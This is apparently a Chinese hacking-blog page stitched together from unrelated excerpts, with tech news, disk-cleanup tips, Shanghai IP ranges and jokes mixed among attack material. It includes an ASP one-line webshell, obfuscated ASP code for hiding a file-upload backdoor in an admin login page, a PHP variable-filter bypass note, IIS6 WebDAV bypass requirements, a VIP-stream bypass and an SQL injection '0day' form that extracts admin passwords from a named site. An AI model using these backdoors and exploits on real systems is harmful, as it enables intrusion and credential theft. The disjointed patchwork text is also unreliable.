河北网络安全博客

来源：邪恶八进制信息安全团队
　　首先回顾一下以前ASP一句话的经典木马吧！
　　<%if request("nonamed")<>"" then execute request("nonamed")%>
　　VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的！网上也有例子我就不多说了！.....
...

今天说的是在管理员的后台登陆界面隐藏我们的后门，这是相对比较安全的，因为管理员的入口不是
经常换的，只要他的登陆界面在，我们的后门就在！

1.从我们的SHELL上找到管理员的入口页面

2.编辑它   在最后面写上一段代码

<%if request.QueryString("action")="comeon" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
...

影响版本:
软件版本信息： 1.2.0 access (其他还未试过)
未出补丁

程序介绍:

采用S/B三层结构编写逻辑更清晰维护更简单,页面显示更快,执行效率更高
栏目自由分类
地区添加修改
独特的专题栏目
可生成HTML与动态切换
方便快速的一键生成 生成进度的显示
逻辑清晰管理更方便
系统集成主流播放器 Qvod 17bobo 迅雷 youku 土豆 56 新浪视频 qq视频 sohu视频 6间房 Flv 流媒体等播放器
...

一种是通过conn.asp获知数据库帐户密码以后
自己构造，另一个是通过搜索查看源代码构造注入点。

第一种：适用条件:

已经获得网站的数据库链接文件,但不是SA权限

(当然如果是MDB数据库那就很简单了,直接下下来就OK了,这里只是针对MSSQL数据库而言)

由于入侵网站并没有注入漏洞所以,无法注入,但是我们可以在本地构造一个存在注入点的文件,然后用NBSI去狂扫,就可以得出数据库的更多信息.

构造方法:

common.inc.php

foreach($_REQUEST as $_k=>$_v)
{
if( strlen($_k)>0 && eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )      //可绕过cfg_|GLOBALS限制
{
   exit('Request var not allow!');
...

W3C validation有时难以操作，但用它你可以查看由 版面设计引起的差错。验证程序抛出大量差错和警告，说明你的XHTML尚未完善，可能无法在不同浏览器上保持一致功能。下面十个细微的失效问题难住了大批 程序员，我们告诉你如何解决。在本文开始前介绍一些使用W3C验证程序时需要注意的问题。

不要担心验证程序的警告——如果验证程序说发现12处错误以及83处警告，不要理它，继续进行下一步。

一次更正一个错误——按顺序进展工作，从上到下，一次修正一个错误。HTML用浏览器从上到下浏览，这些错误也是按同样顺序显示。
...

      自从2009快乐中国快乐女声启动以来，各大唱区都纷纷涌现一些明星脸选手，而且许多明星脸选手更是才艺双全。记者在郑州唱区发现一名选手，外貌神似香港明星张柏芝。工作人员连称简直可以以假乱真。

上海市
58.32.0.0 58.38.255.255
61.129.36.0 61.129.201.255
61.151.55.0 61.152.217.255
61.170.0.0 61.173.174.255
202.109.79.0 202.109.116.255
218.1.30.0 218.1.255.255
218.78.153.0 218.83.255.255
221.239.134.0 222.73.255.255
...

   英特尔一般不会展示出自己产品的弱点。但是在本月早些时候却出现了一个例外，英特尔邀请投资者到其加利福尼亚圣克拉拉市总部，展示了基于其Atom凌动处理器的上网本电脑产品无法象基于主流处理器的电脑那样处理视频流的情况。英特尔的目的是告诉人们，当他们在选购上网本电脑的时候，他们必须知道他们所购买的并不是多媒体电脑。 因为在更早的时候，消费者的购买观念比较混乱，从而导致去年上网本电脑的返还率达到了30％。

   因此，如果你想买一台上网本电脑的话，你必须知道一台售价不到500美元的电脑不能做些什么。 比如，不要想用上网本电脑去玩最新的游戏，不要想用它去编辑视频，也不要奢望用它去看高清电影。

电脑使用一段时间后，很多朋友会发现自己的C盘可用空间竟然只有几十M了。由于C盘是系统盘，与其它分区相比，这里的文件一般并不能直接删除，否则将可能导致系统出错，甚至崩溃。那么我们又该如何释放出C盘的空间呢！
　　一、卸载无用程序

　　首先检查一下自己的程序菜单中有没有不需要使用的程序，如果有可以将它们卸载。卸载的方法很简单，只需要进入控制面板，打开“添加/删除程序”进行操作即可。

　　二、容易忽视的文件夹

　　由于我们在文件操作时，默认保存位置都是“我的文档”。而“我的文档”默认的位置又是在C盘之中，因此当C盘空间不足时，可以先检查一下我的文档中文件的容量，并可以将其转移到其它分区。其方法是打开“我的文档”属性窗口，然后在“目标文件夹”标签中单击“移动”按钮选择新的地点即可。

　　一、建立一个数据表IPStat用于存放用户信息

　　在IPStat表中存放的用户信息只包括登录用户的IP（IP_Address），IP来源（IP_Src）和登录时间（IP_DateTime），些表的信息本人只保存一天的信息，如果要统计每个月的信息则要保存一个月。因为我不太懂对数据日志的操作，所以创建此表，所以说我笨吧，哈哈。

要求：
1.iis6版本
2.开启webdav （allow），在iis控制台里面能看到（web服务扩展）
3.可以绕过501需要windows认证的文件。%c0%af

可怕的金融危机席卷全球，也没有动摇网游虚拟交易这座黄金宝塔，反而使它的光辉更加灿烂。据统计，全球的虚拟物品交易额已经超过百亿美元，面对如此巨大的网游交易市场，大量职业玩家，工作室疯狂涌入，一方面，他们促进了网游虚拟交易的发展，给自己、运营商及玩家带来利润和方便，另一方面，他们在政策、运营商、第三方交易平台、玩家四者之间游走以求得生存，保证整个虚拟交易市场流通环节的完成和发展。

　　目前国内游戏工作室的规模已经慢慢成熟壮大，以打币为主，附加代练。一般情况下，大部分中小工作室以打币盈利，成熟、稳定、信誉好的大型工作室能接到比较大的代练的单子。那工作室构建网游交易黄金塔的密码到底是什么呢?

距《杭州市计算机信息网络安全保护管理条例》正式实施已20余天，其执行结果却差强人意。记者连日采访了杭州各相关部门，发现所谓的网络实名制依旧是一团雾水。

　　“我们没有接到相关执行文件。”杭州市文化广电新闻出版局一位相关负责人告诉记者。他表示，前几年开始实行的网吧实名制目前由该局分管，另外，网络视频的许可证也是该局负责颁发。该局在2005年初合并了原杭州市文化局，目前分管网络文化。

　　作为网络安全的监管部门会有何动作?记者电话联系了杭州市公安局，当记者表示就实名制颁布后，该部门有何新举措进行采访后，网监分局的相关负责人表示，该条例是人大颁布的，公安机关只是职能部门，没有权利就此事发表看法。

...

X:\Documents and Settings\当前用户名\Application Data\PPStream\CLCache 打开此文件夹里的 list_fixed.xml 文件 解压

查找你要观看的VIP节目  看到PPS://的路径    然后在PPS选择 播放   播放网址

打开就能看了  VIP高清

1.当你收到“你干嘛呢？”实际上是想说“我想你了”
2.当你收到“呵呵”，多是没笑或者傻笑
3.但如果是“哈哈”“嘿嘿”或者“嘎嘎”，这时你打过去一定是在笑

Copy code<center><H1>飞天论坛asp版通杀 0day利用程序</H1></center><form  method=post name="luoye">目标地址：<input name="act" type="text" id="act" size="140" value="http://www.kingwq.cn"><br><br>注入语句：<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,